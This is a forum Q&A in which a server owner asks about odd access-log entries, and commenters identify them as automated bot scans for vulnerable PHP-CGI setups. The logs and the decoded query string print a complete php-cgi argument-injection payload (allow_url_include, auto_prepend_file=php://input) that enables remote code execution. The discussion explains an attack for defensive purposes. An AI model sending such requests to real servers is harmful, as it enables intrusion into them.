# Strange entry in LAMP server access_log -- what does this PHP do?

Tags: php, apache, amazon-ec2, lamp, access-log

I am not sure, maybe this question is more appropriate for Server Vault, but I thought the PHP makes it relevant... ?

I see strange entries in my access log of an AWS EC2 instance I set up about a week ago to serve a custom API to an e-commerce site.

There are 5 entries like this:

```
66.49.205.157 - - [06/Jul/2016:15:29:43 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"  
66.49.205.157 - - [06/Jul/2016:15:29:43 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"  
66.49.205.157 - - [06/Jul/2016:15:29:44 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"  
66.49.205.157 - - [06/Jul/2016:15:29:44 +0000] "POST /cgi-bin/php5-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"  
66.49.205.157 - - [06/Jul/2016:15:29:44 +0000] "POST /cgi-bin/php-cgi.bin?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 217 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"
```

The block of HTML encoded entities is:

```
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env="yes" -d cgi.fix_pathinfo=1 -d auto_prepend_file=php://input -n
```

Is this something normal?  Or is this some sort of attempt to hack the server?  Can PHP even be successfully passed as a query string parameter this way if not set up to receive a query string?

Someone also just tried:

`[Wed Jul 06 19:13:08.573437 2016] [:error] [pid 15695] [client 187.245.40.133:59975] script '/var/www/html/command.php' not found or unable to stat`

Comment: random bots looking for exploits, we all get logs full of this

Comment: Check it out: http://php.net/manual/en/security.cgi-bin.attacks.php

Comment: Someone also just tried `[Wed Jul 06 19:13:08.573437 2016] [:error] [pid 15695] [client 187.245.40.133:59975] script '/var/www/html/command.php' not found or unable to stat`...

Comment: yes, php can be hacked that way, and even if php itself isn't vulnerable, code WRITTEN in php can be. ignore the stuff and move on. it's just a stupid bot doing blanket testing of all kinds of different vulnerabilities, and unless you've installed whatever package suffers from that vulnerbility, you're immune.

Answer (score 1, accepted):

Answers:

> "random bots looking for exploits, we all get logs full of this"
>   -[Dagon](https://stackoverflow.com/users/557846/dagon)

.

> "Check it out: php.net/manual/en/security.cgi-bin.attacks.php"
>   -[Omnilord](https://stackoverflow.com/users/2620087/omnilord)

.

> "yes, php can be hacked that way, and even if php itself isn't
>   vulnerable, code WRITTEN in php can be. ignore the stuff and move on.
>   it's just a stupid bot doing blanket testing of all kinds of different
>   vulnerabilities, and unless you've installed whatever package suffers
>   from that vulnerbility, you're immune." -[Marc
>   B](https://stackoverflow.com/users/118068/marc-b)